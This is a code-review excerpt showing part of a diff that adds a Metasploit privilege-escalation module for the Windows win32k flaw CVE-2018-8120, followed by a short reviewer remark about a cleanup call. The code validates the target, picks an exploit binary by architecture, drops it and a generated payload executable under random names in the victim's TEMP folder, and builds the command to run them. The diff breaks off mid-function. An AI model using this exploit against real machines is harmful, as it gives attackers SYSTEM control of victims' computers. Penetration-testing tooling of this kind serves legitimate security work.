modules/exploits/windows/local/ms18_8120_win32k_privesc.rb

```diff
@@ -0,0 +1,121 @@
+    'Author'          => [
+        'unamer', # Exploit PoC
+        'bigric3', # Analysis and exploit
+        'Anton Cherepanov', # Vulnerability discovery
+        'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit module
+      ],
+    'Platform'        => 'win',
+    'SessionTypes'    => [ 'meterpreter' ],
+    'DefaultOptions'  => {
+        'EXITFUNC'    => 'thread'
+      },
+    'Targets'         => [
+        [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
+        [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
+      ],
+    'Payload'         => {
+        'Space'       => 4096,
+        'DisableNops' => true
+      },
+    'References'      => [
+        ['BID', '104034'],
+        ['CVE', '2018-8120'],
+        ['URL', 'https://github.com/unamer/CVE-2018-8120'],
+        ['URL', 'https://github.com/bigric3/cve-2018-8120'],
+        ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
+      ],
+    'DisclosureDate'  => 'May 9 2018',
+    'DefaultTarget'   => 0
+    ))
+  end
+
+  def validate_target
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['OS'] =~ /XP|NT/i
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def write_file_to_target(fname, data)
+    tempdir = session.sys.config.getenv('TEMP')
+    file_loc = "#{tempdir}\\#{fname}"
+    vprint_warning("Attempting to write #{fname} to #{tempdir}")
+    write_file(file_loc, data)
+    vprint_good("#{fname} written")
+    file_loc
+    rescue
+      fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
+  end
+
+  def check_arch
+    sys_arch = sysinfo['Architecture']
+    if sys_arch == ARCH_X86
+      fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
+      return 'CVE-2018-8120x86.exe'
+
+    elsif sys_arch == ARCH_X64
+      return 'CVE-2018-8120x64.exe'
+    else
+      fail_with(Failure::BadConfig, "Invalid architecture")
+    end
+  end
+
+  def exploit
+    validate_target
+    cve_fname = check_arch
+    rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)
+    vprint_status("Reading payload from file #{rexe}")
+    raw = File.read(rexe)
+
+    rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
+    vprint_status("EXE's name is: #{rexename}")
+    exe = generate_payload_exe
+    tempexename = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
+
+    exe_payload = write_file_to_target(tempexename, exe)
+    vprint_status("Payload uploaded to temp folder")
+    cve_exe = write_file_to_target(rexename, raw)
+    command = "\"#{cve_exe}\" \"#{exe_payload}\""
+    vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}")
+    begin
+      register_file_for_cleanup(exe_payload)
+    rescue AccessDeniedError
```

Comment:
`register_file_for_cleanup` simply adds the file to a list of files to be automatically cleaned up in the `cleanup` method upon module completion. It should never `raise`.